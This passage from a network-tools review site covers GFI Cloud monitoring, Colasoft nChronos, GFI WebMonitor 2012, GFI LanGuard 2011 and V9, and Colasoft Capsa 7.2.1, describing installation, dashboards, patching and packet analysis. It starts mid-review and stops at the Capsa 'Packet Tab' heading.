As well as reporting into the GFI Cloud desktop each check can email you or, if you add your number to your cloud profile, send you an SMS text alert. So now you can relax on your sun lounger and sip your beer safe in the knowledge that if your phone’s quiet then all is well back at the office.

Adding More Machines To GFI Network Server Monitor Online

gfi-network-server-monitor-cloud-7

Adding more machines is a two-step process. First you need to download the agent installer and run it on the machine in question. There’s no need to login - it knows who you are so you can do a silent push installation and everything will be fine. GFI Cloud can also create a group policy installer for installation on multiple workstations and servers. On our XP machine the agent only took 11k of RAM and there was no noticeable performance impact on any of the machines we tested.

Once the agent’s running the second step is to select the cloud service(s) you want to apply:

gfi-network-server-monitor-cloud-8

When you sign up for GFI cloud you purchase a pool of licenses and applying one to a machine is as simple as ticking a box and almost as quick – our chosen product was up and running on the target machine in less than a minute.

This approach gives you amazing flexibility. You can add services to and remove them from your machines whenever you like, making sure that every one of your purchased licenses is working for you. It’s also scalable – you choose how many licenses to buy so you can start small and add more as you grow. Taking the license off a machine doesn’t remove it from GFI Cloud (it just stops the service) so you can easily put it back again, and if a machine is ever lost or scrapped you can retrieve its licenses and use them somewhere else. Quite simply, you’re in control.

Other Features

Officially this review is about Network Server Monitor Online, but by adding a machine into GFI Cloud you also get a comprehensive hardware and software audit. This is quite useful in itself but when coupled with Network Server Monitor Online it tells you almost everything you need to know:

gfi-network-server-monitor-cloud-9

On top of this you can reboot machines remotely and see at a glance which machines have been shut down or, more ominously, are supposed to be up but aren’t talking to the cloud.

The whole thing is very easy to use but should you need it the documentation is excellent and you can even download a free e-book to help you on your way.

In Conclusion

What GFI has done here is simply brilliant. For a price that even the smallest organisation can afford you get the kind of monitoring, auditing and alerting that you know you need but think you don’t have the budget for. Because it’s cloud-based it’s also a godsend for those with numerous locations or lots of home-workers and road warriors. The low up-front cost and the flexible, scalable, pay-as-you-go licensing should please even the most hard-bitten financial director. And because it’s so easy to use it can sit there working for you in the background while you get on with other things.

Could it be improved? Yes, but even as it stands this is a solid product that brings reliable and useful monitoring, auditing and alerting within the reach of those who can’t justify the expense of dedicated servers and costly software. GFI is on a winner here, and for that reason we’re giving GFI Cloud and GFI Network Server Monitor Online the coveted Firewall.cx ten-out-of-ten award.

  • Hits: 17551

Colasoft: nChronos v3 Server and Console Review

Reviewer: Arani Mukherjee

review-100-percent-badgenChronos, a product of Colasoft, is one of the cutting edge packet/network analysers that the market has to offer today. What we have been promised by Colosoft through their creation is an end to end, round the clock packet analysis, coupled with historical network analysis. nChronos provides an enterprise network management platform which enables users to troubleshoot, diagnose  and address network security and performance issues. It also allows retrospective network analysis and, as stated by Colasoft, will “provide forensic analysis and mitigate security risks”. Predictably it is a must have for anyone involved with network management and security.

Packet analysis has been in the forefront for a while, for the purposes of network analysis; detection of network intrusion; detect misuse; isolate exploited systems; monitor network usage; bandwidth usage; endpoint security status; verify adds, moves and changes and various other such needs. There are quite a few players in this field and, for me, it does boil down to some key unique selling points. I will lay out the assessment using criteria like ease of installation, ease of use, unique selling points and, based on all of the aforementioned, how it stacks up against competition.

Ease of Installation - nChronos Installation

The installation instructions for both nChronos Server and console are straightforward. You install the server first, followed by the console. Setting up the server was easy enough. The only snag that I encountered was when I tried to log onto the server for the first time. The shortcut created by default runs the web interface using the default web browser. However, it calls ‘localhost’ as the primary link for the server. That would bring up the default web page of the physical server on which nChronos server was installed. I was a bit confused when the home page of my web server came up instead of what I was expecting. But one look into the online help files and the reference on this topic said to try ‘localhost:81’ as an option and, if that doesn’t work, try ‘localhost:82’. The first option worked straight away, so I promptly changed the shortcut of nChronos server to point to ‘localhost:81’. Voilà, all was good. Rest of the configuration was extremely smooth, and the run of events followed exactly what was said in the instruction manual. For some reason at the end of the process the nChronos server is meant to restart. If by any chance you receive an error message in the lines of the server not being able to restart, it’s possibly a glitch. The server restarted just fine, as I found out later. I went ahead to try the various installation scenarios mentioned and all of them worked just as fine.

Once the server was up and running, I proceeded to install the nChronos Console, which was also straightforward. It worked the first time, every time. With the least effort I was able to link up the console with the server and start checking out the console features. And yes, don’t forget to turn the monitoring on for the network interfaces you need to manage. You can do that either from the server or from the console itself. So all in all, the installation process passed with some high grades.

Ease Of Use

Just before starting to use the software I was getting a bit apprehensive about what I needed to include in this section. First I thought I would go through the explanation of how the software works and elaborate on the technologies used to render the functionalities provided. But then it occurred to me that it would be redundant for me to expand on all of that because this is specialist software. The users of this type of software are already aware of what happens in the background and are well versed with the technicalities of the features. I decided to concentrate on how effectively this software helps me perform the role of network management, packet tracing and attending to issues related to network security.

The layout of the nChronos Server is very simple and I totally agree with Colasoft’s approach of a no nonsense interface. You could have bells and whistles added but they would only enhance the cosmetic aspect of the software, adding little or nothing to its function.

colasoft nchronos server administrationThe screenshot above gives you an idea of what the Server Administration page looks like, which is the first page that would open up once the user has logged in. This is the System Information page. On the left pane you will find several other pages to look at i.e. Basic Settings which displays default port info and HDD info of the host machine, User Account (name says it all), and Audit Log (which will basically show the audit trail of user activity.)

The interesting page to look at is Network Link. This is where the actual interfaces to be monitored are added. The screenshot below shows this page:

colasoft nchronos network link

Obviously for the purpose of this review the only NIC registered on the server was the NIC of my own machine. This is the page from where you can start monitoring of the various network interfaces all over your network. Packet data for any NIC would not be captured if you haven’t clicked on the ‘Start’ button for the specific NIC. So don’t go about blaming the car not starting up when you haven’t even turned the ignition key!!!

All in all, it’s simple and it’s effective as it gives you less chances of making any errors.

Now that the server is all up and running we use the nChronos Console to peer into the data that it is capturing:

colasoft nchronos network console

The above screenshot shows the console interface. For the sake of simplicity I have labelled three separate zones, 1, 2, and 3. When the user logs in the for first time, he/she has to select the interface that needs to be looked at from zone 2 and click on the ‘Open’ button. That then shows all the details about that interface in Zones 1 and 3. Notice in Zone 1 there is a strip of buttons, one of which is the auto–scroll feature. I loved this feature as it helps you the see traffic as it passes through. To see a more detailed data analysis you simply click drag and release the mouse button to select a time frame. This unleashes a spectrum of relevant information in Zone 3. Each and every tab displays the packets captured through a category window, e.g. The application tab will show the types of application protocols have been used in that time frame i.e. HTTP, POP, etc.

One of the best features I found was the ability to parse each line of data under any tab by just double clicking on it. So if I double clicked the link on the application tab that says HTTP, it would drill down to IP Address. I can keep on drilling down and it would traverse from HTTP IP AddressIP ConversationTCP Conversation. I can jump to any specific drill down state by right clicking on the application protocol itself and making a choice on the right click menu. This is a very useful feature. For the more curious, the little spikes in traffic in zone 1 was my mail application checking for new mail every 5 seconds.

The magic happens when you right click on any line of data and select ‘Analyse Packet’. This invokes the nChronos Analyzer:

colasoft nchronos packet analyzer

The above screenshot shows what the Analyzer looks like by default. This was by far my favourite tool. The way the information about the packets was shown was just beyond belief. This is one example where Colasoft has shown one of its many strengths, where it can combine flamboyance with function. The list of tabs on the top will give you an idea of how many ways the Analyzer can show you the data you want to see. Some of my favourites were the following: Protocol

colasoft nchronos analysis

This is a screenshot of the Protocol Tab. I was impressed with seeing the number of column headers that were being used to show detailed information about the packets. The tree-like expanded way of showing protocols under particular data units, based on the layers involved, was useful.

Another one of my favourite tabs was the Matrix:

colasoft nchronos network matrix

The utility of this tab is to show the top 100 end to end conversions which can be IP conversions, physical conversions etc. If you double click any of those lines denoting a conversion it opens up an actual data exchange between the nodes. This is very important for a network manager if there is a need to decipher what exact communication was ensuing between to nodes, be it physical or IP, for a given point of time. It can be helpful in terms of checking network abuse, intrusions etc.

This brings me to my most favourite tab of all, the Packet tab. This tab will show you end to end data being exchanged between any two interfaces and show you exactly what data was being exchanged. I know most packet analyzers primary function is to be able to do that but I like Colasoft’s treatment of this functionality:

colasoft nchronos packet analysis

I took the liberty of breaking up the screen into three zones to show how easy it was to delve into any packet. In zone 1, you would select exactly which interchange of data between any concerned nodes you want to splice. Once you have done that, zone 2 starts showing the packet structure in terms of the difference network protocols i.e. Data link layer, Network Layer, Transport Layer, Application Layer etc. Then zone 3 shows you the actual data that was encapsulated inside that specific packet. This is by far the most lucid and practical approach I have seen by any packet analyzer software when showing encapsulated data within packets. I kid you not, I have seen many packet analyzers and Colasoft trumps the lot.

Summary

Colasoft’s unique selling points will always remain simplicity, careful positioning of features to facilitate easy access for users, presentation of data in a non–messy way for maximum usage and, specially for me, making me feel like a Crime Scene Investigator of networks, like you might see on CSI–Las Vegas (apologies to anyone who is hasn’t seen the CSI series).

Network security has become of paramount importance to us in our daily lives as more and more civil, military and scientific work and facilities are becoming dependant on networks. For a network administrator it is not only important to resume normalcy of network operations as soon as possible but also to go back and investigate successfully why an event, capable of crippling a network, might have happened in the first place. This is also applicable in terms of preventing such a disruptive event.

Colasoft’s nChronos Server and Console coupled with Analyzer is an assorted bundle of efficient software which helps to perform all the function required to preserve network integrity and security. It is easy to setup and maintain, requires minimum intervention when it’s working and delivers vast amounts of important information in the easiest manner possible. This software bundle is a must-have for any organisation which, for all the right reasons, values its network infrastructure highly, and wants to preserve its integrity and security.

  • Hits: 18948

GFI WebMonitor 2012 Internet Web Proxy Review

Review by Alan Drury and John Watters

review-badge-98The Internet connection is vital for many Small to Medium or Large-sized enterprises, but it can also be one of the biggest headaches. How can you know who is doing what? How can you enforce a usage policy? And how can you protect your organisation against internet-borne threats? Larger companies tend to have sophisticated firewalls and border protection devices, but how do you protect yourself when your budget won’t run to such hardware? This is precisely the niche GFI has addressed with GFI WebMonitor.

How Does GFI WebMonitor 2012 Work?

Before we get into the review proper it’s worth taking a few moments to understand how it works. GFI WebMonitor installs onto one of your servers and sets itself up there as an internet proxy. You then point all your browsers to the internet via that proxy and voilà – instant monitoring and control.

The server you choose doesn’t have to be internet-facing or even dual-homed (although it can be), but it does obviously need to be big enough and stable enough to become the choke point for all your internet access. Other than that, as long as it can run the product on one of the supported Microsoft Windows Server versions, you’re good to go.

We tested it in a average company that had an adequate amount of PCs, laptops and mobile clients (phones), running on a basic ADSL internet connection and a dual-core Windows 2003 Server box that was doing everything, including being the domain controller and the print server in its spare time, and happily confirmed no performance impact on the server.

Installing GFI WebMonitor 2012

As usual with GFI we downloaded the fully functional 30-day evaluation copy (82Mb) and received the license key minutes later by email. On running the installer we found our humble server lacked several prerequisites but happily the installer went off and collected them without any fuss.

review-gfi-webmonitor2012-1

After that it offered to check for updates to the program, another nice touch:


The next screen is where you decide how you want to implement the product. Having just a single server with a single network card we chose single proxy mode:

review-gfi-webmonitor2012-3

With those choices made the installation itself was surprisingly quick and before long we were looking at this important screen:

review-gfi-webmonitor2012-4

We reconfigured several user PCs to point to our newly-created http proxy and they were able to surf as if nothing had happened. Except, of course, for the fact that we were now in charge!

We fired off a number of web accesses (to www.Firewall.cx of course, among others) and some searches, then clicked Finish to see what the management console would give us.

WebMonitor 2012 - The All-Seeing Eye

The dashboard overview (above) displays a wealth of information. At a glance you can see the number of sites visited and blocked along with the top users, top domains and top categories (more on these later).  There’s also a useful trending graph which fills up over time, and you can change the period being covered by the various displays using the controls in the top right-hand corner. The console is also web-based so you can use it remotely.

review-gfi-webmonitor2012-5Many of the displays are clickable allowing you to easily drill down into the data, and if you hover the mouse you’ll get handy pop-up explanations. We were able to go from the overview to the detailed activities of an individual user with just a few clicks. A user here is a single source IP, in other words a particular PC rather that the person using it. Ideally we would have liked the product to query the Active Directory domain controller and nail down the actual logged-on user but to be honest given the reasonable price and the product’s undoubted usefulness we’re not going to quibble.

The other dashboard tabs help you focus on particular aspects. The Bandwidth tab (shown below) and the activity tab let you trend the activity either by data throughput or the number of sessions as well as giving you peaks, totals and future projections. The real-time traffic tab shows all the sessions happening right now and lets you kill them, and the quarantine tab lists the internet nasties that WebMonitor has blocked.

review-gfi-webmonitor2012-6

To the right of the dashboard, the reports section offers three pages of ad-hoc and scheduled reports that you can either view interactively or have emailed to you. You can pretty much get anything here: the bandwidth wasted by non-productive surfing during a time period; the use of social networking sites and/or webmail; the search engine activity; the detailed activity of a particular user and even the use of job search websites on company time.

review-gfi-webmonitor2012-7

Underlying all this is a huge database of site categories. This, along with the malware protection, is maintained by GFI and downloaded daily by the product as part of your licensed support so you’ll need to stay on support moving forward if you want this to remain up to date.

The Enforcer

Monitoring, however, is only half the story and it’s under the settings section that things really get interesting.  Here you can configure the proxy (it can handle https if you give it a certificate and it also offers a cache) and a variety of general settings but it’s the policies and alerts that let you control what you’ve been monitoring.

review-gfi-webmonitor2012-8

By defining policies you can restrict or allow all sorts of things, from downloading to instant messaging to categories of sites allowed or blocked and any time restrictions. Apply the relevant policies to the appropriate users and there you go.

The policies are quite detailed. For example, here’s the page allowing you to customise the default download policy. Using the scrolling list you can restrict a range of executables, audio/video files, document types and web scripts and if the default rules don’t meet your needs you can create your own. You can block them, quarantine them and generate an alert if anyone tries to do what you’ve forbidden.

review-gfi-webmonitor2012-9

Also, hidden away under the security heading is the virus scanning policy. This is really nice - GFI WebMonitor can scan incoming files for you using several anti-virus, spyware and malware detectors and will keep these up to date. This is the part of the program that generates the list of blocked nasties we mentioned earlier.

Pull down the monitoring list and you can set up a range of administrator alerts ranging from excessive bandwidth through attempted malware attacks to various types of policy transgression. By using the policies and alerts together you can block, educate or simply monitor across the whole spectrum of internet activity as you see fit.

review-gfi-webmonitor2012-10

Final Thoughts

GFI WebMonitor is a well thought-out, thoughtfully focussed and well integrated product that provides everything a small to large-sized enterprise needs to monitor and control internet access at a reasonable price. You can try it for free and the per-seat licensing model means you can scale it as required. It comes with great documentation both for reference and to guide you as you begin to take control.

 

  • Hits: 24228

Product Review - GFI LanGuard Network Security Scanner 2011

review-gfi-languard2011-badge
Review by Alan Drury and John Watters

Introduction

With LanGuard 2011 GFI has left behind its old numbering system (this would have been Version 10), perhaps in an effort to tell us that this product has now matured into a stable and enterprise-ready contender worthy of  serious consideration by small and medium-sized companies everywhere.

Well, after reviewing it we have to agree.

In terms of added features the changes here aren’t as dramatic as they were between say Versions 8 and 9, but what GFI have done is to really consolidate everything that LanGuard already did so well, and the result is a product that is rock-solid, does everything that it says on the tin and is so well designed that it’s a joy to use.

Installation

As usual for GFI we downloaded the fully-functional evaluation copy (124Mb) from its website and received our 30-day trial licence by email shortly afterwards. Permanent licences are reasonably priced and on a sliding scale that gets cheaper the more target IP addresses you want to scan. You can discover all the targets in your enterprise but you can only scan the number you’re licensed for.

Installation is easy. After selecting your language your system is checked to make sure it’s up to the job:

review-gfi-languard-2011-1
The installer will download and install anything you’re missing but it’s worth noting that if you’re on a secure network with no internet access then you’ll have to get them yourself.

Once your licence is in place the next important detail is the user account and password LanGuard will use to access and patch your machines. We’d suggest a domain account with administrator privileges to ensure everything runs smoothly across your whole estate. And, as far as installation goes, that’s pretty much it.

Scanning

LanGuard opened automatically after installation and we were delighted to find it already scanning our host machine:

review-gfi-languard-2011-2

The home screen (above) shows just how easy LanGuard is to use. All the real-world tasks you’ll need to do are logically and simply accessible and that’s the case all the way through. Don’t be deceived, though; just because this product is well-designed doesn’t mean it isn’t also well endowed.

Here’s the first treasure – as well as scanning and patching multiple versions of your Windows OS’s LanGuard 2011 interfaces with other security-significant programs. Here it is berating us for our archaic versions of Flash Player, Java, QuickTime and Skype:

review-gfi-languard-2011-3

This means you can take, from just one tool, a holistic view of the overall security of your desktop estate rather than just a narrow check of whether or not you have the latest Windows service packs. Anti-virus out of date? LanGuard will tell you. Die-hard user still on an older browser? You’ll know. And you can do something about it.

Remediation

Not only will LanGuard tell you what’s missing, if you click on Remediate down in the bottom right of the screen you can ask the product to go off and fix it. And yes, that includes the Java, antivirus, flash player and everything else:

review-gfi-languard-2011-4

Want to deploy some of the patches but not all? No problem. And would you like it to happen during the dark hours? LanGuard can do that too, automatically waking up the machines, shutting them down again and emailing you with the result. Goodness, we might even start to enjoy our job!

LanGuard can auto-download patches, holding them ready for use like a Windows SUS server, or it can go and get them on demand. We just clicked Remediate and off it went, downloaded our updated Adobe AIR and installed it without any fuss and in just a couple of minutes.

Agents and Reports

Previous versions of LanGuard were ‘agentless’, with the central machine scanning, patching and maintaining your desktop estate over the network. This was fine but it limited the throughput and hence what could be achieved in a night’s work. While you can still use it like this, LanGuard 2011 also introduces a powerful agent-based mode. Install the agent on your PCs (it supports all the current versions of Windows) and they will do the work while your central LanGuard server merely gives the orders and collects the results. The agents give you a lot of power; you can push-install them without having to visit every machine, and even if a laptop strays off the network for a while its agent will report in when it comes back. This is what you’d expect from a scalable, enterprise-credible product and LanGuard delivers it in style.

The reports on offer are comprehensive and nicely presented. Whether you just want a few pie charts to convince your boss of the value of your investment or you need documentary evidence to demonstrate PCI DSS compliance, you’ll find it here:

review-gfi-languard-2011-5

A particularly nice touch is the baseline comparison report; you define one machine as your baseline and LanGuard will then show you how your other PCs compare to it, what’s missing and/or different:

review-gfi-languard-2011-6

Other Features

What else can this thing do? Well there’s so much it’s hard to pick out the best points without exceeding our word limit, but here are a few of our favourites:

  • A comprehensive hardware audit of all the machines in your estate, updated regularly and automatically, including details of the removable USB devices that have been used
  • An equally comprehensive and automatic software audit, broken down into useful drag-and-drop categories, so you’ll always know exactly who has what installed. And this doesn’t just cover applications but all the stuff like Java, flash, antivirus and antispyware as well
  • The ability to define programs and applications as unauthorised, which in turn allows LanGuard to tell you where they are installed, alert you if they get installed and – oh joy, automatically remove them from the user’s machines
  • System reports including things like the Windows version, shared drives, processes, services and local users and groups including who logged on and when
  • Vulnerability reports ranging from basic details like open network ports to detected vulnerabilities with their corresponding OVAL and CVE references and hyperlinks for further information
  • A page of useful tools including SNMP walk, DNS lookup and enumeration utilities

Conclusion

We really liked this product. If you have a shop full of Windows desktops to support and you want complete visibility and control over all aspects of their security from just one tool then LanGuard 2011 is well worth a look. The real-world benefits of a tool like this are undeniable, but the beauty of LanGuard 2011 is in the way those benefits are delivered. GFI has drawn together all the elements of this complicated and important task into one seamless, intuitive and comprehensive whole and left nothing out, which is why we’ve given LanGuard 2011 the coveted Firewall.cx 10/10 award.

 

  • Hits: 28615

GFI Languard Network Security Scanner V9 Review

With Version 9, GFI's Network Security Scanner has finally come of age. GFI has focussed the product on its core benefit – maintaining the security of the Windows enterprise – and the result is a powerful application that offers real benefits for the time-pressed network administrator.

Keeping abreast of the latest Microsoft patches and Service Packs, regular vulnerability scanning, corrective actions, software audit and enforcement in a challenging environment can really soak up your time. Not any more though – install Network Security Scanner and you can sit back while all this and more happens automatically across your entire estate.

The user interface for Version 9 is excellent; so intuitive in fact that we didn't touch the documentation at all yet managed all of the product's features. Each screen leads you to the next so effectively that you barely need to think about what you are doing and using the product quickly becomes second nature.

Version 8 was good, but with Version 9 GFI has done it again.

Installation

Installation is straightforward. All the software needs is an account to run under, details of its back-end database and a location to reside. MS Access, MSDE or MS SQL Server databases are supported and you can even migrate your data from one to another if needs be.

The Interface

The separate toolbar scheduler from Version 8 is gone and, in its place, the opening screen gives you all the options you need: Scan this Computer, Scan the Network, Custom Scan or Scheduled Scan. Click ‘Scan this Computer' and the scan begins – just one simple mouse click and you're off.

reviews-gfi-languard-v9-1

Performance and Results

Scanning speed is just as good as Version 8 and in less than two minutes we had a summary of the results:

reviews-gfi-languard-v9-2

Simply look below the results summary and the handy Next Steps box (with amusing typographical error) leads you through the process of dealing with them.

The prospect of Analizing the results made our eyes water so, having taken care to protect our anatomy from any such unwarranted incursion, we clicked the link:

reviews-gfi-languard-v9-3

The scan results are grouped by category in the left column with details to the right. Expand the categories and you get a wealth of information.

The vulnerabilities themselves are described in detail with reference numbers and URLs to lead you to further resources, but that's not all. You also get the patch status of the scanned system, a list of open ports, a comprehensive hardware report, an inventory of the installed software and a system summary. Think of all this in terms of your enterprise – if you have this product scanning all your machines you can answer questions such as “Which machines are still on Service Pack 2?” or “How much memory is in each of the Sales PCs?” or “What software does Simon have installed on his laptop?” without going anywhere else. It's all there for you at the click of a mouse.

There are other gems here as well, too many to list but here are some of our favourites. Under Potential Vulnerabilities the scanner lists all the USB devices that had been connected so we could monitor the historical use of memory sticks and the like. And the software audit, useful in itself, held another delight. Right click on any software entry and you can tell the scanner to uninstall it, either from just this machine or from all the machines in the network. Go further and define a list of banned applications and the product will remove them for you, automatically, when it runs its regular scan. Imagine the face of that wayward user each morning …

Patch Deployment

Choose the Remediate link and you'll head off to the part of the product that installs patches and service packs. Needless to say, these can be downloaded for you from Microsoft as they are released and held by the product, ready for use:

reviews-gfi-languard-v9-4

You can either let the scanner automatically install whatever patches and service packs it finds missing or you can vet and release patches you want to allow. This will let you block the next release of Internet Explorer, for example, while allowing other critical patches through. You can also uninstall patches and service packs from here.

As in Version 8, you can also deploy custom software to a single machine or across your estate. In a nutshell, if it is executable or can be opened then you can deploy it. As a test we pushed a picture of a pair of cute kittens to a remote machine where the resident graphics program popped open to display them. You can install software just as easily provided the install needs no user intervention:

reviews-gfi-languard-v9-5

reviews-gfi-languard-v9-6

Alerts and Reporting

This is where GFI demonstrates it is serious about positioning this product as a robust and reliable enterprise-ready solution.

Firstly the scanner can email you the results of its nocturnal activities so all you have to do each morning is make yourself a coffee and check your inbox. We'd have liked to see this area expanded, perhaps with definable events that could trigger an SMS message, SNMP trap or a defined executable. Maybe in Version 10?

To convince your manager of the wisdom of your investment there is a good range of coloured charts and if you have the GFI report Manager framework the product slots right into that so you can generate detailed custom reports from the back-end database.

reviews-gfi-languard-v9-7

And speaking of the database, GFI has now provided maintenance options so you can schedule backups and perform management tasks from within the scanner itself; a good idea for a key application.

Subscribe to what?

A vulnerability scanner is only any good, of course, if it can be automatically updated with the latest exploits as they come out. GFI has changed the business model with Version 9, so you'll be expected to shell out a modest annual fee for a Software Maintenance Agreement (SMA) unlike Version 8 where you paid in full and updates were free thereafter.

A nag screen reminds you when your subscription runs out so you needn't worry about not noticing:

reviews-gfi-languard-v9-8

Conclusion

What more can we say? If you have an estate of Windows machines to secure and maintain then this is what you have been looking for. It does everything you might need and more, it's easy to use and delivers real-world benefits.

  • Hits: 20791

Colasoft Capsa v7.2.1 Network Analyser Review

Using network analysing software, we are able to monitor our network and dig into the various protocols to see what's happening in real time. This can help us understand much better the theoretical knowledge we've obtained throughout the years but, most importantly, help us identify, troubleshoot and fix network issues that we wouldn't be able to do otherwise.

A quick search on the Internet will surely reveal many network analysers available making it very confusing to select one. Some network analysers provide basic functions, such as packet sniffing, making them ideal for simple tasks while others give you all the necessary tools and functions to ensure your job is done the best possible way.

Colasoft's network analyser is a product that falls in the second category. We had the chance to test drive the Colasoft Network Analyser v7.2.1 which is the latest available version at the time of writing.

Having used previous versions of Colasoft's network analyser, this latest version we tested left us impressed and does, in fact, promise a lot no matter what the environment demands.

The Software

Colasoft's Capsa network analyser is available as a demo version directly from their website www.colasoft.com. We quickly downloaded the 21.8mb file and began the installation which was a breeze. Being small and compact meant the whole process didn't take more than 30-40 seconds.

We fired up the software, entered our registration details, activated our software and up came the first screen which shows a completely different philosophy to what we have been used to:

reviews-colasoft-1

Before you even start capturing packets and analysing your network, you're greeted with a first screen that allows you to select the network adaptor to be used for the session, while allowing you to choose from a number of preset profiles regarding your network bandwidth (1000, 100, 10 or 2 Mbps).

Next, you can select the type of analysis you need to run for this session ranging from Full analysis, Traffic Monitoring, Security analysis to HTTP, Email, DNS and FTP analysis. The concept of pre-configuring your packet capturing session is revolutionary and very impressive. Once the analysis profile is selected, the appropriate plug-in modules are automatically loaded to provide all necessary information.

For our review, we selected the ‘100Mb Network’ profile and ‘Full Analysis’ profile, providing access to all plug-in modules, which include ARP/RARP, DNS, Email, FTP, HTTP and ICMPv4 – more than enough to get any job done!

Optionally, you can use the ‘Packet Filter Settings’ section to apply filters to the packets that will be captured:

reviews-colasoft-2

The Main Dashboard

As soon as the program loaded its main interface, we were left surprised with the wealth of information and options provided.

The interface is broken into four sections: tool bar, node explorer, dashboard and online resource. The node explorer (left lower side) and online resource (right lower side) section can be removed, providing the dashboard with the maximum possible space to view all information related to our session.

reviews-colasoft-3

The menu provided allows the configuration of the program, plus access to four additional tools: Ping, Packet Player, Packet Builder and MAC Scanner.

To uncover the full capabilities of the Colasoft Capsa Network Analyser, we decided to proceed with the review by breaking down each of the four sections.

The ToolBar

The toolbar is populated with a number of options and tools that proved extremely useful and are easily accessible. As shown below, it too is broken into smaller sections allowing you to control the start - stop function of your capturing session, filters, network profile settings from where you can set your bandwidth settings, profile name, alarms and much more.

reviews-colasoft-4

The Analysis section is populated with some great features we haven't found in other similar tools. Here, you can enable or disable the built-in ‘diagnosis settings’ for over 35 different protocols and tcp/udp states.

reviews-colasoft-5

When selecting a diagnosis setting, Colasoft Capsa will automatically explain, in the right window, what the setting shows and the impact on the network. When done, click on the OK button and you're back to the main capturing screen.

The Analysis section also allows you to change the buffer size in case you want to capture packets for an extended period of time and, even better, you can enable the ‘auto packet saving’ feature which will automatically save all captured packets to your hard drive, making them available whenever you need them.

Right next to the analysis section is the 'Network Utilisation' and 'pps' (packets per second) gauges, followed by the 'Traffic History Chart'. These nifty gauges will show you in almost realtime the utilisation of your network card according to the network profile you selected before, plus any filters that might have been selected.

For example, if a 100Mbps network profile was selected, the gauges will represent the utilisation of a 100Mbps network card. If, in addition, filters were selected e.g. HTTP, then both gauges will represent a 100Mbps network utilisation only for the HTTP protocol. So if there were a large email or FTP download, it wouldn't register at the gauges as they will only show utilisation for HTTP traffic, according to the filter.

To give the gauges a try, we disabled all filters and started a 1.4Gig file transfer between our test bed and server, over our 100Mbps network. Utilisation hit the red areas while the pps remained at around 13,000 packets per second.

reviews-colasoft-6

The gauges are almost realtime as they are updated once every second, though we would have loved to see them swinging left-right in real time. One issue we encountered was that the 'Traffic History Chart' seemed to chop off the bandwidth value when moving our cursor toward the top of the graph. This is evident in our screenshot where the value shown is 80.8Mbps, and makes it almost impossible to use the history chart when your bandwidth is almost 100% utilised. We hope to see this fixed in the next version.

At the very end of the toolbar, the 'Packet Buffer' provides visual feedback on how full the buffer actually is, plus there are a few options to control the packet buffer for that session.

Node Explorer & DashBoard

On the lower left area we'll find the 'Node Explorer' which works in conjunction with the main dashboard to provide the information of our captured session. The Node Explorer is actually a very smart concept as it allows you to instantly filter information captured.

The Node Explorer starts populating the segmented areas automatically as it captures packets on the network. It provides a nice break-down of the information using a hierarchical approach that also follows the OSI model.

As we noticed, we could choose to select the Physical Explorer that contained nodes with MAC Addresses, or select the IP Explorer to view information about nodes based on their IP Address.

Each of these sections are then further broken down as shown. A nice simple and effective way to categorise the information and help the user find what is needed without searching through all captured packets.

Once we made a selection (Protocol Explorer/Ethernet II/IP (5) as shown below, the dashboard next to it provided up to 13 tabs of information which are analysed in the next screenshot.

reviews-colasoft-7

Selecting the IP Tab, the protocol tab in the main dashboard provided a wealth of information and we were quickly able to view the quantity of packets, type of traffic, amount of traffic and other critical information for the duration of our session.

We identified our Cisco Call Manager Express music-on-hold streaming under the UDP/SCCP, which consumes almost 88Kbps of bandwidth, an SNMP session which monitors a remote router accounting for 696bps of traffic, and lastly the ICMP tracking of our website, costing us another 1.616Kbps of traffic. All together, 89.512Kpbs.

reviews-colasoft-8

This information is automatically updated every second and you can customise the refresh rate from 10 presets. One function we really loved was the fact we could double-click on any of the shown protocols and another window would pop up with all packets captured for the selected protocol.

We double-clicked on the OSPF protocol (second last line in the above screenshot) to view all packets related to that protocol and here is what we got:

reviews-colasoft-9

Clearly there is no need to use filters as we would probably need to in other similar type of software, thanks to the smart design of the Node Explorer and Dashboard. Keep in mind that if we need to have all packets saved, we will need the appropriate buffer, otherwise the buffer is recycled as expected.

Going back to the main area, any user will realise that the dashboard area is where Colasoft's Capsa truly excels and unleashes its potential. The area is smartly broken into a tabbed interface and each tab does its own magic:

reviews-colasoft-10

The user can quickly switch between any tabs and obtain the information needed without disrupting the flow of packets captured.

Let's take a quick look at what each tab offers:

Summary Tab

The Summary tab is an overview of what the network analyser 'sees' on the network.

reviews-colasoft-11

We get brief statistics on the total amount of traffic we've seen, regardless of whether it’s been captured or not, the current network utilisation, bits per second and packets per second, plus a breakdown of the packet sizes we've seen so far. Handy information if you want to optimise your network according to your network packet size distribution.

Diagnosis Tab

The Diagnosis tab is truly a goldmine. Here you'll see all the information that related to problems automatically detected by Colasoft Capsa without additional effort!

This amazing section is broken up into the Application layer, Transport layer and Network layer (not shown). Capsa will break down each layer in a readable manner and show all related issues it has detected.

reviews-colasoft-12

Once a selection has been made - in our example we choose the 'Application layer/ DNS Server Slow Response' - the lower area of the window brings up a summary of all related packets this issue was detected in.

Any engineer who spends hours trying to troubleshoot network issues will truly understand the power and usefulness of this feature.

Protocol Tab

The Protocol tab provides an overview and break-down of the IP protocols on the network, along with other useful information as shown previously in conjunction with the Node Explorer.

reviews-colasoft-13

Physical Endpoint Tab

The Physical Endpoint tab shows conversations from physical nodes (Mac Addresses). Each node expands and its IP Address is revealed to help track the traffic. Similar statistics regarding the traffic is also shown:

reviews-colasoft-14

As with previous tabs, when selecting a node the physical conversation window opens right below and shows the relevant conversations along with their duration and total traffic.

IP Endpoint Tab

The IP Endpoint tab offers similar information but on the IP Layer. It shows all local and Internet IP addresses captured along with statistics such as number of packets, total bytes received, packets per second and more.

reviews-colasoft-15

When selecting an IP Address, Capsa will show all IP, TCP and UDP conversations captured for this host.

IP Conversation Tab

The IP Conversation tab will be useful to many engineers. It allows the tracking of conversations between endpoints on your network, assuming all traffic passes through the workstation where the Capsa Network Analyser is installed.

The tab will show individual sessions between endpoints, duration, bytes in and out from each end plus a lot more.

reviews-colasoft-16

Network engineers can use this area to troubleshoot problematic sessions between workstations, servers and connections toward the Internet. Clicking on a specific conversation will show all TCP and UDP conversations between the hosts, allowing further analysis.

Matrix Tab

The Matrix tab is an excellent function probably only found on Colasoft's Capsa. The matrix shows a graphical representation of all conversations captured throughout the session. It allows the monitoring of endpoint conversations and will automatically resolve endpoints when possible.

reviews-colasoft-17

Placing the mouse over a string causes Capsa to automatically show all relevant information about conversations between the two hosts. Active conversations are highlighted in green, multicast sessions in red and selected session in orange.

The menu on the left allows more options so an engineer can customise the information.

Packet Tab

